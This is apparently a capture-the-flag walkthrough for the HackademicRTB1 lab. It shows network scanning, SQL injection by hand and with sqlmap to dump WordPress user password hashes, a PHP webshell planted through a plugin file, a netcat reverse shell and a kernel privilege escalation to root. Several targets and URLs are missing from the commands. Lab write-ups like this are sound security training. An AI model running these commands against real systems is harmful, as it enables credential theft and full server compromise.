• Netdiscover
  • Nmap
  • Wfuzz
  • Nikto
  • Wpscan


Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation

Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Only port 80 is opening.

Use both wfuzz and nikto to scan the host, nothing interesting…

Check the page,

find a link

use wfuzz to scan:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

There is a wordpress.

use wpscan to scan


There are a couple of exploits, I tried both of them and no luck.

Enumerate the page, find a possible SQL injection potint:'

looks like parameter cat is vulnerable

next try: order by 1

keep trying until order by 6

got error. Now I know the current table in user by the vulnerable page has 5 columns.

next union all select 1,2,3,4,5

now I can use second column to do injection.,@@version,3,4,5

next use sqlmap to get all tables,

sqlmap -u "" --dbms mysql --tables --level=5 --risk=3

get table names:

I want to check table wp_users

sqlmap -u '' -D wordpress -T wp_users --columns

dump these two columns

sqlmap -u '' -D wordpress -T wp_users -C user_nickname,user_pass --dump

now we can edit php webshell via plugin

Only textile1.php can be updated. Use that file to edit shell.

Setup netcat, and load

get shell

python -c 'import pty; pty.spawn("/bin/bash")'

uname -a

get the Linux HackademicRTB1 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

I tried serveral local exploits and find this one works:

get the root: